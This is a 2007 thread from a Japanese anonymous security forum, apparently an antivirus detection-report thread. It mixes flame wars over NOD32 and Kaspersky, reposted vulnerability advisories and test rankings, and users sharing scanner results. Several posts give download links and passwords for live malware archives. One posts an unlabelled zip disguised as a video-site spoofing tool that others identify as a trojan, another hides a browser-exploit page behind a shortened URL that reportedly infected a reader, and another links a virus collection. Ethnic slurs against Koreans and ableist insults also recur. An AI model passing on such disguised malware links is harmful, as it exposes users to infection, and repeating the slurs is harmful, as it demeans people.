84 :名無しさん@お腹いっぱい。:2007/06/17(日) 01:52:03
◆QXMN1BniMs←コイツ嘘つきw

85 : ◆QXMN1BniMs :2007/06/17(日) 01:53:57
>>82-83
なんでそんな偉そうなんだか
良いとは思うけど一応メールにも著作権あるんで、そう居丈高に吠えないでくれ
ただなぜあれが一次ソースだと思えるのか、そちらの方が理解できないよ

>お問い合わせのニュースリリースページは、ご指摘の通り、
>Eset社のリリースを翻訳して掲載しています。
>恐れ入りますが、内容に関しましては、直接Eset社に
>お問い合わせくださいますようお願い申し上げます。
>
>以上でございますが、どうぞよろしくお願いいたします。

お前が聞いても同じ返事が返ってくるよ

86 :名無しさん@お腹いっぱい。:2007/06/17(日) 02:08:59
>>82-84=間違いを指摘されて顔が真っ赤な>>62w

87 :名無しさん@お腹いっぱい。:2007/06/17(日) 03:54:15
パート3の本スレはここでいいの?

88 :名無しさん@お腹いっぱい。:2007/06/17(日) 04:14:57
>>85
内容全く変わってるじゃん、それでEsetにメールしたのか?、嘘つきw

89 :名無しさん@お腹いっぱい。:2007/06/17(日) 05:02:01
>>88
結局ソースになってないという事実に変わりはないと思うが
事の発端はお前がデタラメを抜かしたということでしかないわけで

90 :名無しさん@お腹いっぱい。:2007/06/17(日) 05:18:17
>>89
関係ねぇよ
1次ソースが発覚するまで2次ソースを一次ソースと考えるのは間違ったことじゃねしな。
はやいことEsetにメールしろよ。

というかコイツは信じちゃダメだろ→◆QXMN1BniMs
既に嘘ついてるんだからなw

91 :名無しさん@お腹いっぱい。:2007/06/17(日) 05:25:45
>>82-84=88=90=間違いを指摘されて顔が真っ赤な>>62

すごい粘着ぶりだな
俺には内容が変わってるようには見えんが・・・
http://www.eset.com/company/article.php?contentID=3081
とりあえず一次ソースはここだ低脳。さっさと消えろ

92 :名無しさん@お腹いっぱい。:2007/06/17(日) 05:49:52
>1次ソースが発覚するまで2次ソースを一次ソースと考えるのは間違ったことじゃねしな。
>1次ソースが発覚するまで2次ソースを一次ソースと考えるのは間違ったことじゃねしな。
>1次ソースが発覚するまで2次ソースを一次ソースと考えるのは間違ったことじゃねしな。
>1次ソースが発覚するまで2次ソースを一次ソースと考えるのは間違ったことじゃねしな。
>1次ソースが発覚するまで2次ソースを一次ソースと考えるのは間違ったことじゃねしな。

93 :名無しさん@お腹いっぱい。:2007/06/17(日) 12:33:09
>>91
■NOD32がNO.1だと、誇大情報が流されいる件(重大)
http://pc11.2ch.net/test/read.cgi/software/1086995317/401-404


94 :ついでに、NOD32信者の不具合その1:2007/06/17(日) 12:34:38

■Wikipediaに何度注意されてもデマを記載し続ける。
ttp://ja.wikipedia.org/wiki/NOD32
>検知能力の高さに定評があり、2005年に発生した価格.comのWebサイトが一部改ざんされ
>コンピュータウイルス(トロイの木馬型)を仕掛けられた事件では、他の多くのアンチウイルスソフトが
>軒並み検知できずに通過させてしまった中、プログラムに実装されているヒューリスティックエンジンにより、
>対応定義ファイルの提供前段階でウイルスを検知して遮断したことでその名が知られるようになった。


↓価格ドットコムのクラック事件の時に流れた「早期に検出できたのはNODだけ」という誤報の顛末

※誤報
>http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20050516/160933/
>5月11日時点で今回のウイルスに対応していたのは,「NOD32」という対策ソフトだけだった
>(価格コムが)NOD32の情報しか記載していなかったのは,同製品でしか検出できなかったためである

※価格自身が後になって5月4日から既に対応済みのソフトがあったと情報を訂正
>http://www.kakaku.com/info/200505/antivirus.html
>カスペルスキー 2005.5.4 Trojan-PSW.Win32.Delf.fz
>※1 各ソフトメーカーによってウイルスの名称や、ウイルスの定義(複数のウイルスを1つのウイルスとして
>検知するソフトもございます)は異なりますが、同様に検出が行えます。



95 :NOD32信者の不具合その2:2007/06/17(日) 12:36:24

■NOD32のwikiに誤報に基づいた誇大な説明文を載せ続けるだけで気が済まず、
目の敵にしている製品の一つのkasperskyのwikiを改竄しているNOD厨。


>【Anti Virus】Kaspersky Lab Part34【AntiSpy】
>http://pc11.2ch.net/test/read.cgi/sec/1178212581/
>
>260 名前:名無しさん@お腹いっぱい。 [sage] 投稿日:2007/05/06(日) 22:36:27
>wiki編集したやつ間違い大杉


>【Anti Virus】Kaspersky Lab Part24【AntiSpy】
>http://pc11.2ch.net/test/read.cgi/sec/1168516577/
>
>520 名前:名無しさん@お腹いっぱい。 [sage] 投稿日:2007/05/06(日) 22:27:48
>>518
>明らかにNOD厨だろ
>他の人も書いてたが、NODのwiki編集したIPの奴が、カスペのwikiの良いこと書いてる部分を消してたぞ。
>カスペの項目は明らかに他意が介入してる。


■NOD32がNO.1だと、誇大情報が流されいる件(重大)
http://pc11.2ch.net/test/read.cgi/software/1086995317/401-404

■NOD32 信者情報■
http://tmp6.2ch.net/test/read.cgi/tubo/1176131495/
http://pc11.2ch.net/test/read.cgi/sec/1167829054/
”録音”と呼ばれたいた頃のNOD32信者
http://z-temp.hp.infoseek.co.jp/2ch/Prescott699-.html


96 :販売代理店の話:2007/06/17(日) 12:37:54

■ネットで語られている、NOD32とOutpost-Proを扱っている代理店の対応の話の抜き出し■

#NOD32
>ttp://secunia.com/advisories/19054/
>セキュリティホールが見つかって、本家はVer2.51.26で修正されてるんだけど
>日本語版はVer2.50.42のまま平気で売られてる。
>キヤノンに問い合わせても、セキュリティリスクが少ないからと言って
>日本語版は更新されずに放置のまま。(長い年月の後にVer2.7がやっとリリース)
>
>前にNOD32をアンインストールすると、アプリケーションの追加と削除の項目の大半が消えてしまうという、
>凄まじい不具合を起こしたことがあるけど、それにしても日本語版のリリースは遅れすぎ。
>
>他にも代理店のサイトに書いていないNOD32の脆弱性情報のごく一部。
ttp://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1649
ttp://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0951
ttp://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3212
ttp://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2903
ttp://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0062


#Outpost-Pro
>同じ代理店で扱っているOutpost-Proも酷い状態だよ。
>本家(英語版)がVer4.0なのに、日本語版はまだVer2.7というモノ凄さ。
>
>他のフリーソフトのPFWは本家の英語版がバージョンアップすると、
>一週間程度で日本語化パッチが出来ていたのに、フリーソフトにも劣るこの対応。


97 :代理店は脆弱性情報をサイトに記載する習慣がない:2007/06/17(日) 12:40:11
>>96の続き

■最近の脆弱性
>2007/05/23
>NOD32 Antivirus Detected File Action Buffer Overflow Vulnerabilities
>http://secunia.com/advisories/25375/

>2007/05/21
>NOD32 Antivirus Long Path Name Stack Overflow Vulnerabilities
>http://www.st.ryukoku.ac.jp/~kjm/security/ml-archive/bugtraq/2007.05/msg00352.html


■また対応が遅い。いつものように、ver3が出るまで放置のパターン?
>NOD32アンチウィルス Part47
>
>710 名前:名無しさん@お腹いっぱい。 [] 投稿日:2007/05/26(土) 22:58:41
>ttp://secunia.com/advisories/25375/
>NOD32 Ver2.70.37以下に脆弱性が見つかった。
>Ver2.70.39で修正されているが、日本語版は未だ提供されていない。



98 :検出力のまとめ:2007/06/17(日) 12:41:48

■NOD32は専門機関AV-Comparativesのテストにて、
 総合的検出力で八位まで落ちてBクラスに落ちた。
http://pc11.2ch.net/test/read.cgi/sec/1087037111/336

■AV-Test.orgという専門機関のアンチウイルス検知力テスト結果の場合(2007年05月22日)
http://pc11.2ch.net/test/read.cgi/sec/1087037111/411
16位)Nod32     88.32%

■www.virus.grの2007度5月最新テスト結果
http://pc11.2ch.net/test/read.cgi/sec/1087037111/401
10.位 Nod32 version 2.70.32 - 94.00%

■新種マルウェアの検出もほとんど駄目
http://pc11.2ch.net/test/read.cgi/sec/1087037111/404

■新種ルートキットの検出も駄目
http://pc11.2ch.net/test/read.cgi/sec/1087037111/410

■NOD32が該当すると思われる専門家の指摘
http://internet.watch.impress.co.jp/cda/event/2007/02/26/14890.html
>ただし、「マイナーなベンダーの検知率が高いというわけではない。中には、ヒューリステックに頼りすぎて、
>ウイルスの検体を集めず、ちゃんとシグネチャを作らないところもある」と補足した。

99 :NOD32はマイクロソフトのアンチウイルスにも負け始めてきた:2007/06/17(日) 12:43:02

>マルウェア注意
>
>マカフィー・ユーザーのブログに、
>ワードパッドなどで簡単に埋め込める悪質なオブジェクトがあることが紹介されていたのでご注意です。
>
>マイクロソフトやマカフィー、シマンテック(ノートン)、kasperuskyなどの
>多くの主要なベンダーは、既に対応していますが、
>アンラボやNOD32など一部のベンダーは、まだ未対応なので気をつけて下さい。
>
>*マカフィー・ユーザーの検証ブログ
>ttp://www.avertlabs.com/research/blog/index.php/2007/05/25/rich-text-malware/


100 :NOD32を良いランクにしているテストも、実は裏があった:2007/06/17(日) 12:46:07
http://www.av-comparatives.org/seiten/ergebnisse_2007_05.php

■AV-Comparatives.orgのランク付けは、一般消費者には、あまり意味のないもの。
ランク付けで最も重視された基準は、本物のウイルスの検出数ではなく、誤検出の数。

ttp://www.av-comparatives.org/seiten/ergebnisse/report14.pdf

この資料の6ページ目に、誤検出数の具体的な個数が書いていましたが、
Fortinetという製品(1000以上の誤検出)以外は、
全サンプル中で、たった0個から36個の誤検出に過ぎませんでした。

実際のユーザー環境では、誤検出しても一時隔離して、ベンダーに真偽を確認すれば済むが、
本物のウイルスを検出できないのは致命的。

今回からのプロアクティブ性能のランク付けでは、
誤検出が18個で、本物のウイルスを14628個できている製品よりも、
誤検出は8個でも、本物のウイルスは5659個しか検出できていない製品の方がランクが上となっている。

101 :「PC WORLD」によるNOD32の評価:2007/06/17(日) 12:47:16

●「PC WORLD」によるNOD32の評価
http://www.pcworld.com/article/id,130869/article.html

"NOD32's overall malware detection rate wasn't stellar, however. When pitted against AV-Test.org's nearly 900,000-strong "zoo"
of Trojans, viruses, and other malware, NOD32 caught only 90 percent, compared to the 96 percent rate of top performers Kaspersky Anti-Virus 6,
Symantec Norton AntiVirus 2007, and BitDefender Antivirus 10. It fared surprisingly poorly with 32-bit Windows viruses (approximately 1 in 11 samples in the zoo), catching only 73 percent.

In disinfection tests, NOD32 cleaned up all malware files but missed resulting changes to the Hosts network settings
file and most of the less-important Registry changes, for a disappointing 55 percent success rate."

しかしながら、NOD32のマルウェアの総合的な検出力はより優れているとはいえない。
AV-Test.orgのトロイ、ウイルス、その他のマルウェアなどの"約90万の"zoo"の検体に対しては、
優秀なカスペルスキー、ノートン、BitDefenderなどが検出率96%の成績を占めるのに比べ、NOD32はたったの90%しか検出しなかった。
情けないことには、32ビットのWindowsウイルスに至っては、たったの73%と驚くほど検出性能が低かった。

除去テストでも、すべてのマルウェアを取り除くことができたが、がっかりしたことには、ホストのネットワークの設定ファイルや
比較的重要ではないレジストリの変更に対しては、55%しか駆除できなかった。


102 :名無しさん@お腹いっぱい。:2007/06/17(日) 12:49:59

NODを巡る話題が出ていたので、以上、NOD32スレから転載(*^・ェ・) 
http://pc11.2ch.net/test/read.cgi/sec/1181020973/
---------------------------------------------------------


103 :名無しさん@お腹いっぱい。:2007/06/17(日) 13:08:42
>>98
セキュリティ板の別スレにアップされた新種マルウェアの検出状況。
ttp://www5.uploader.jp/user/tane/images/tane_uljp00004.jpg
ttp://www5.uploader.jp/user/tane/images/tane_uljp00005.jpg
ttp://www5.uploader.jp/user/tane/images/tane_uljp00006.jpg
ttp://www5.uploader.jp/user/tane/images/tane_uljp00007.jpg
ttp://www5.uploader.jp/user/tane/images/tane_uljp00008.jpg
ttp://www5.uploader.jp/user/tane/images/tane_uljp00009.jpg
ttp://www5.uploader.jp/user/tane/images/tane_uljp00010.jpg
ttp://www5.uploader.jp/user/tane/images/tane_uljp00011.jpg
ttp://www5.uploader.jp/user/tane/images/tane_uljp00012.jpg
ttp://www5.uploader.jp/user/tane/images/tane_uljp00013.jpg
ttp://www5.uploader.jp/user/tane/images/tane_uljp00014.png
ttp://www5.uploader.jp/user/tane/images/tane_uljp00015.jpg
ttp://www5.uploader.jp/user/tane/images/tane_uljp00016.png
ttp://www5.uploader.jp/user/tane/images/tane_uljp00017.jpg
ttp://www5.uploader.jp/user/tane/images/tane_uljp00018.png
ttp://www5.uploader.jp/user/tane/images/tane_uljp00019.png
ttp://www5.uploader.jp/user/tane/images/tane_uljp00020.jpg
ttp://www5.uploader.jp/user/tane/images/tane_uljp00021.jpg
ttp://www5.uploader.jp/user/tane/images/tane_uljp00022.jpg
ttp://www5.uploader.jp/user/tane/images/tane_uljp00023.jpg
ttp://www5.uploader.jp/user/tane/images/tane_uljp00024.jpg

>http://pc11.2ch.net/test/read.cgi/sec/1177739872/
>http://pc11.2ch.net/test/read.cgi/sec/1177848342/
>http://pc11.2ch.net/test/read.cgi/sec/1174461579/

104 :名無しさん@お腹いっぱい。:2007/06/17(日) 13:10:13
新種ルートキットの場合

・Kaspersky検知名:Trojan-Spy.Win32.Agent.rs
ttp://www5.uploader.jp/user/tane/images/tane_uljp00025.png

・McAfee検知名:New Malware.bc
ttp://www5.uploader.jp/user/tane/images/tane_uljp00026.png

105 :名無しさん@お腹いっぱい。:2007/06/17(日) 23:01:30
カス厨が都合のいい情報並べてるだけやん

106 :名無しさん@お腹いっぱい。:2007/06/17(日) 23:42:08
どうでもいいから、君は韓国に帰って謹慎してて。
後のことは、我々日本人に任せて頂戴ね。

107 :名無しさん@お腹いっぱい。:2007/06/18(月) 00:04:37
>>1の学名 -> Periplaneta koreanea

108 :名無しさん@お腹いっぱい。:2007/06/18(月) 01:21:46
カス厨が都合のいい情報並べてるだけやん

109 :名無しさん@お腹いっぱい。:2007/06/18(月) 02:06:43
気違いが荒らしているだけなのだが・・・

110 :名無しさん@お腹いっぱい。:2007/06/18(月) 02:11:40
覚えたて乙

111 :名無しさん@お腹いっぱい。:2007/06/18(月) 02:48:00
やっぱり既にスレッド機能していないね。
NOD厨禁止スレと同じ状態になってキチガイ歓迎スレッドになっている

112 :名無しさん@お腹いっぱい。:2007/06/18(月) 03:01:24
アク禁依頼に使用できるから問題なし

113 :名無しさん@お腹いっぱい。:2007/06/18(月) 03:44:58
アク禁判断はキチガイ判定は不可能。そもそもそんな判定をするところではない。
アク禁判定はキチガイかどうかは別問題で行われている。
よって現スレタイ下で機能していないのは、考慮に入れるべき内容である

114 :名無しさん@お腹いっぱい。:2007/06/18(月) 03:54:24
日本語勉強しろよ、気違いw

115 :名無しさん@お腹いっぱい。:2007/06/18(月) 03:59:02
運営は、忙しいのか人が足らないのかよくわからんが、とにかくやる気ない。
荒されても、専ブラで対応してくれ!スルーしてくれ!の一点張り。
ID導入をさんざんお願いしても、全く聞く耳持たず。(強硬に反対しているキティも自治スレにはいるし)

116 :名無しさん@お腹いっぱい。:2007/06/18(月) 04:27:09
運営側って具体的に誰?

117 :名無しさん@お腹いっぱい。:2007/06/18(月) 04:45:09
>>115
やる気はある、報告側が途中で放棄してるだけ
↓これも書式を直してたら掘られていた。

★070303 複数板av-comparativesランクコピペ マルチポスト報告スレ
http://qb5.2ch.net/test/read.cgi/sec2chd/1172928273/96-97

96 名前: ◆rika./AgiE 投稿日:2007/06/07(木) 23:50:45 ID:hnUaPzic0
>>87-91
書式不備です。
あと>>94は読みにくいので報告対象だけまとめてください

97 名前:名無しの報告 投稿日:2007/06/11(月) 21:09:47 ID:Dl2LmiHj0
>>94
書式不備の説明補足
曜日が入っているとダメ
http://pc11.2ch.net/test/read.cgi/sec/1179808317/847 2007/06/05(火) 23:02:52
正しくは↓
http://pc11.2ch.net/test/read.cgi/sec/1179808317/847 2007/06/05 23:02:52

98 名前:報告人 ◆DHhoNrB7.2 投稿日:2007/06/14(木) 01:14:54 ID:r3+7XXKM0
>>96-97
ご指摘ありがとうございます。
現状でも、荒らし等がひどいですが、キンタマウイルス貼りがなくなったため、誠に勝手ではございますが、
今回の規制申請は辞退させていただきます。


118 :名無しさん@お腹いっぱい。:2007/06/18(月) 07:50:53
低能なNOD厨>>1が、うっかり白状。
NOD厨>>1は「a」というコテになりすまして、暴れることがあるそうだ。

>http://pc11.2ch.net/test/read.cgi/sec/1181235178/299
>「劇団ひとり、雑音、Z、Z先生、NOD厨」が別人だとか、
>「雑音が数年前から投稿していない」とか、必死な情報操作お疲れさんですw
>
>ちなみに、「自己紹介レス」というアホな習性を持つNOD厨が、
>電波自演の中で、うっかり本当のことを書いてしまった一行を発見w
>↓NOD厨は「a」というコテになりすまして、暴れることがあるとうっかり白状してました。
>
>>>281
>また、Zや劇団ひとりがaになりすますことがあるので注意

119 :名無しさん@お腹いっぱい。:2007/06/18(月) 15:31:47
>>117=NODスレ主=>>1
自演乙w

そういやアンタって、NODスレ住民が自分の意のままに動かないのにファビョって、
自分で立てたNODスレをコピペ埋め立てしてログ掘りされているね。

で、コピペ荒らしをする時は串を使っていたのがバレちゃったと。


>070106 セキュ板NOD32スレ「低次元化」荒らし報告スレ
>http://qb5.2ch.net/test/read.cgi/sec2chd/1168028791/
>45 名前:名無しの報告 [sage] 投稿日:2007/01/06(土) 17:33:53 ID:zCRXSTcR0
>125x100x52x19.ap125.ftth.ucom.ne.jp は焼けてます。
>
>【BBQBBM19本目】公開串登録所【ピンポイント規制】
>http://qb5.2ch.net/test/read.cgi/sec2chd/1165992601/692,695



120 :名無しさん@お腹いっぱい。:2007/06/18(月) 17:38:49
NODスレ主叩きは気違いの特徴であり、擦り付けも気違いの特徴w
串使いは気違いに決定かな?

121 :名無しさん@お腹いっぱい。:2007/06/18(月) 18:24:46
>>120
それ君の事じゃんw
擦り付けようとしてるしw
串使いはNOD厨だろw

122 :名無しさん@お腹いっぱい。:2007/06/18(月) 21:03:42
>>117のリンクが見れねーと思ったら、捏造リンクだな…
正しくはこちらのスレ。

★070606 セキュリティ板 カスペルスキー製品荒らし報告
http://qb5.2ch.net/test/read.cgi/sec2chd/1181070528/

掘られるどころか、報告者があまりにアホだった為に
相手にされず放置されてる模様。

123 :名無しさん@お腹いっぱい。:2007/06/18(月) 21:41:11
今回のは余りにも酷いから報告も大変だなw

124 :名無しさん@お腹いっぱい。:2007/06/18(月) 23:28:22
>>122
掘られなくて嬉しそうだなNOD厨(w

125 :名無しさん@お腹いっぱい。:2007/06/18(月) 23:59:00
初期スレの>>1だけど久しぶりに覗きに来たらパート3まできてんのかw

126 :名無しさん@お腹いっぱい。:2007/06/19(火) 00:04:12
ここはNOD厨が立てた不良スレだけどね。
↓本物のパート3スレはこっち。

【信者】検出可否報告スレ3【禁止】
http://pc11.2ch.net/test/read.cgi/sec/1181836779/

127 :名無しさん@お腹いっぱい。:2007/06/19(火) 12:47:11
>>118
続きネタですw

http://tmp6.2ch.net/test/read.cgi/tubo/1176131495/647
>雑音がセキュリティ板やソフトウェア板に、多数の工作コピペを貼っていた。
>「劇団ひとり・雑音・Z・Z先生・NOD厨など」がそれぞれ別人で、
>しかもバスター使いだと主張している嘘コピペを。
>今更、そんな嘘コピペを貼りまくっても、騙される人なんか居ないだろうに。
>雑音が、小学生の精神年齢を持ったオッサン無職ヒッキーだということがよく分かる事件だわ(藁
>http://pc11.2ch.net/test/read.cgi/software/1158451041/702

128 :名無しさん@お腹いっぱい。:2007/06/20(水) 00:27:25
しかもそれに乗じてバスターに工作されていただけで、実はNODが良ソフト的な流れにしようとしてるのなw

129 :名無しさん@お腹いっぱい。:2007/06/20(水) 01:21:38
実際良いソフトだけどな

130 :名無しさん@お腹いっぱい。:2007/06/20(水) 02:23:11
>>129
ほらきた

131 :名無しさん@お腹いっぱい。:2007/06/20(水) 02:25:38
何が?
VSがか?

132 :名無しさん@お腹いっぱい。:2007/06/20(水) 04:24:52
http://pc11.2ch.net/test/read.cgi/sec/1162223199/748
キの正体が分かったみたいw
別なソフトを使っている人々に罪を擦り付けていたんだなあ。

133 :名無しさん@お腹いっぱい。:2007/06/20(水) 11:02:56
>>127をどう読んだら>>128と考えることが出来るんだろう?

134 : ◆5P2LbbKfE6 :2007/06/20(水) 12:34:16
>>125
初期スレの1さんですか?
パート2【信者】検出可否報告スレ2【禁止】の1です。
今現在、一部の心無き者達によってスレが機能していません。
パート3は二つありますが、どちらもテンプレを無視して無断で立てられたものです。
そこであなたにお願いがあります。
本スレの前の方にある私の書いたテンプレを参考に、別パート3を立てて欲しいのです。テンプレの編集はあなたに任せます。
大半の人はこれに賛同するはずです。お願いします。



135 :名無しさん@お腹いっぱい。:2007/06/20(水) 16:18:49
>>134
賛同しないよ。お前がネタ投下しろよ


136 :名無しさん@お腹いっぱい。:2007/06/20(水) 16:26:07
◆5P2LbbKfE6=気違い
お前、このスレ出禁な

137 :名無しさん@お腹いっぱい。:2007/06/20(水) 20:52:15
セキュリティー板ではほとんどROMですが、
>>132のようなNOD32信者の醜すぎる行為が多くて閉口します。

ここセキュリティー板でしょう?
人格障害者の遊び場所ではないんでしょう?

138 :名無しさん@お腹いっぱい。:2007/06/20(水) 21:24:50
人格障害者はお前、>>132のどこを見てNOD32信者が出てくるのか一般人には理解不能。

139 :名無しさん@お腹いっぱい。:2007/06/20(水) 22:43:35
お前は一般人ではないじゃんw
自己弁護乙。

140 :名無しさん@お腹いっぱい。:2007/06/20(水) 22:50:37
>>139
>>138のどこを見て、お前は一般人ではないじゃんとなるのか一般人には理解不能。
このように一般人に理解不能な発言を繰り返す奴は気違いと呼ばれるに相応しいw

141 :名無しさん@お腹いっぱい。:2007/06/20(水) 23:21:09
朝鮮妖怪のどこが一般人なんだか(w

142 :名無しさん@お腹いっぱい。:2007/06/20(水) 23:39:50
>>138
仕事していない奴は、朝も昼も夜も深夜も早朝も元気一杯だな。
そういう奴が”一般人”になったら、この国が滅ぶんだがね。

143 :名無しさん@お腹いっぱい。:2007/06/20(水) 23:45:13
【調子こいて】雑音犬畜生Part39【自演しまくり】

656 名前:最低人類0号 [] 投稿日:2007/06/20(水) 23:36:23 ID:G/GVSDl2
>>638
雑音先生の、この自演を見て、まじ吹いた・・・・(w
これが自己紹介レスという雑音奥義でつか( ´∀`)


一番いいセキュリティソフトはなんだ!!Part25
http://pc11.2ch.net/test/read.cgi/sec/1181235178/783,785

783 名前:名無しさん@お腹いっぱい。 [sage] 投稿日:2007/06/20(水) 23:23:55
>>781
既にカスペスレもNODスレも荒れてますがな。
しかし、カスペスレにも新たな動きが出始めてる。
カスペスレでも荒らしはバスター厨だと気づき始めた。

785 名前:名無しさん@お腹いっぱい。 [sage] 投稿日:2007/06/20(水) 23:27:53
>>783
気づいていたけど皆必死さに同情して、シカトしていたんじゃないw

144 :名無しさん@お腹いっぱい。:2007/06/20(水) 23:45:54
チョン公乙

145 :名無しさん@お腹いっぱい。:2007/06/20(水) 23:47:41
> 仕事していない奴は、朝も昼も夜も深夜も早朝も元気一杯だな。
> そういう奴が”一般人”になったら、この国が滅ぶんだがね。
どのスレを見て妄想しているんだ?

146 :名無しさん@お腹いっぱい。:2007/06/21(木) 00:00:27
>>145
自分の将来に不安を感じてるんでしょ

147 :名無しさん@お腹いっぱい。:2007/06/21(木) 00:37:08
社保庁見てれば不安になって当然だな

148 :名無しさん@お腹いっぱい。:2007/06/21(木) 00:46:37
池沼は国が面倒見てくれてるから年中2chを荒らしむ放題

149 :名無しさん@お腹いっぱい。:2007/06/21(木) 01:11:02
役人は遊んでても食わせてもらえるもんな

150 :名無しさん@お腹いっぱい。:2007/06/21(木) 01:15:00
役人は遊んでても給料貰えるけど時間拘束はされる、池沼は施設で監禁されているが2chはやりたい放題。
いい加減PCを取り上げろと言いたいな。

151 :名無しさん@お腹いっぱい。:2007/06/21(木) 02:58:59
対応してない所は検体提出しましょう
パス:kentai
ttp://www5.uploader.jp/user/tane/images/tane_uljp00049.png
ttp://www5.uploader.jp/dl/tane/tane_uljp00050.rar.html

152 :名無しさん@お腹いっぱい。:2007/06/21(木) 03:34:50
>>151
バスター2007
TROJ_TIBS.ZPとして検出

153 :名無しさん@お腹いっぱい。:2007/06/21(木) 06:15:33
>>151
AVG検体送りますた

154 :名無しさん@お腹いっぱい。:2007/06/21(木) 07:36:25
>>151
FIS2007
C:\Documents and Settings\\デスクトップ\tane_uljp00050\xx1232255.exe に不正なコードを検知しました。
感染: Trojan-Downloader.Win32.Tibs.lf
処理: ファイルを検疫しました
ttp://www.f-secure.com/v-descs/luder_a.shtml

155 :名無しさん@お腹いっぱい。:2007/06/21(木) 09:19:05
>>151
まかふぃー未対応につき送りまつ

156 :名無しさん@お腹いっぱい。:2007/06/21(木) 11:44:40
>>151
NOD32も検出できてないのですぐ送った。

157 :名無しさん@お腹いっぱい。:2007/06/21(木) 14:25:44
またまた>>1の自己紹介レスが炸裂www
バスター厨をNOD厨と読み換えると、そのものずばり真実w


>一番いいセキュリティソフトはなんだ!!Part25
>886 名前:名無しさん@お腹いっぱい。 [sage] 投稿日:2007/06/21(木) 13:50:17
>バスター厨の精神構造は常識やぶりにも程があるね。
>これ程、面の皮が厚くてねちっこく手段選ばぬなりふり構わない自演見てるとあきれる。
>付き合ってレスしてバトルしてるとこっちまで基地扱いされかねないし
>かといって、黙ってみてると癌のような爆発的繁殖力で被害拡大するし。
>まったく、凄い物がいたもんだ。

158 :名無しさん@お腹いっぱい。:2007/06/21(木) 15:50:09
NOD厨Zが再び自爆w


一番いいセキュリティソフトはなんだ!!Part25
http://pc11.2ch.net/test/read.cgi/sec/1181235178/


933 :名無しさん@お腹いっぱい。:2007/06/21(木) 15:41:12
>>931
バスター厨には全てNOD厨の自演に見えるんだねw
バスター厨がそうしてるからそう見えるのかw
実際にはこのスレで約4〜5人がバスター叩きしてるんだけど



939 :名無しさん@お腹いっぱい。:2007/06/21(木) 15:45:43
>バスター厨には全てNOD厨の自演に見えるんだねw
>実際にはこのスレで約4〜5人がバスター叩きしてるんだけど

自爆レス乙。
無ID板で人数まで具体的に断言できるということは、
NOD厨が自分で演じているバスター叩きキャラが4〜5人居るということに他ならないな。

159 :名無しさん@お腹いっぱい。:2007/06/21(木) 22:46:50
NOD厨酷すぎるね・・・
荒らされた経験のあるスレの住人はNOD厨か雑音が犯人ってわかってるのに・・・


160 :名無しさん@お腹いっぱい。:2007/06/21(木) 22:59:00
【NOD厨】検出力調査スレ2【出禁】
http://pc11.2ch.net/test/read.cgi/sec/1177739872/

おいおまえら。まずこっちを埋めなさい。

161 :名無しさん@お腹いっぱい。:2007/06/22(金) 02:06:25
>>151
乙。Nortonも未検知なんで贈っときます。。。

162 :名無しさん@お腹いっぱい。:2007/06/24(日) 07:37:23
            | | | |||
            | | | |||
            | | | |||
            | | | |||
            ∧_∧ 
           (; ´Д`)ウワー
            ヽつ  ⊃
             ヽつ_つ

ttp://www.geocities.jp/emdmygvv/NicoPremiumSpoofer-20070620.zip

163 :名無しさん@お腹いっぱい。:2007/06/24(日) 16:33:24
【検体サンプル】>>162
【ソフト名】 カスペ7.0
【結果】 5ファイル、1種(Trojan.Win32.Shutdowner.bc)
detected: Trojan program Trojan.Win32.Shutdowner.bc File: NicoPremiumSpoofer-20070620.zip/data.exe
detected: Trojan program Trojan.Win32.Shutdowner.bc File: NicoPremiumSpoofer-20070620.zip/nico.exe
detected: Trojan program Trojan.Win32.Shutdowner.bc File: NicoPremiumSpoofer-20070620.zip/ReadMe.exe
detected: Trojan program Trojan.Win32.Shutdowner.bc File: NicoPremiumSpoofer-20070620.zip/SETUP.EXE
detected: Trojan program Trojan.Win32.Shutdowner.bc File: NicoPremiumSpoofer-20070620.zip/sound.exe

【SS】http://www5.uploader.jp/dl/tane/tane_uljp00056.png.html


検体貼るときは、検体であることの表記、ZIPパスワードお願いしまつ。

164 :名無しさん@お腹いっぱい。:2007/06/25(月) 02:24:21
http://fyad.org/ny3w
1035069.zip pass:virus

165 :名無しさん@お腹いっぱい。:2007/06/25(月) 05:43:44
>>164
ブラクラ注意!
元アドレス ttp://bebe.run.buttobi.net/up/src/be_0794.jpg


166 :名無しさん@お腹いっぱい。:2007/06/25(月) 06:06:34
>>164
AntiVir対応してるんだけど、このアドレス踏んだらやられた

EXP/HTML.WindowBo.G

167 :名無しさん@お腹いっぱい。:2007/06/25(月) 21:19:42
>>164
ブラクラを貼るときは、この糞スレに!

ブラクラを春スレ
http://pc11.2ch.net/test/read.cgi/sec/1182560306/

168 :名無しさん@お腹いっぱい。:2007/06/26(火) 09:56:11
ttp://www.hackpalace.com/virii/collection/com/s.zip

169 :名無しさん@お腹いっぱい。:2007/06/26(火) 10:56:29
>>168
AntiVir とりあえず

End of the scan: 2007年6月26日 10:45
Used time: 02:50 min

The scan has been done completely.

0 Scanning directories
670 Files were scanned
663 viruses and/or unwanted programs were found
0 classified as suspicious:
0 files were deleted
0 files were repaired
1 files were moved to quarantine
0 files were renamed
0 Files cannot be scanned
7 Files not concerned
1 Archives were scanned
0 Warnings
0 Notes
0 Hidden objects were found

170 :名無しさん@お腹いっぱい。:2007/06/26(火) 16:37:28
【検体サンプル】>>168
【ソフト名】 カスペ7.0
【結果】 656
【SS】略

171 :名無しさん@お腹いっぱい。:2007/06/26(火) 18:07:31
まだDOSウイルスを検査する馬鹿がいるのか

172 :名無しさん@お腹いっぱい。:2007/06/26(火) 20:31:43
ttp://www5.uploader.jp/dl/tane/tane_uljp00057.rar.html
p=kentai

173 :名無しさん@お腹いっぱい。:2007/06/26(火) 21:15:34
>>172
AntiVir

yamada/0bd95a05 ya_wmp.exe
[DETECTION] Is the Trojan horse TR/Crypt.CFI.Gen
yamada/61d1ea8d ya_wmp.exe
[DETECTION] Is the Trojan horse TR/Crypt.CFI.Gen
yamada/windows vista keygen.exe
[DETECTION] Is the Trojan horse TR/Proxy.Agent.IW

174 :名無しさん@お腹いっぱい。:2007/06/26(火) 23:16:45
>>172
Norton Internet Security 2007
Backdoor.Nodelm
W32.Yawmo ×2

175 :名無しさん@お腹いっぱい。:2007/06/26(火) 23:59:48
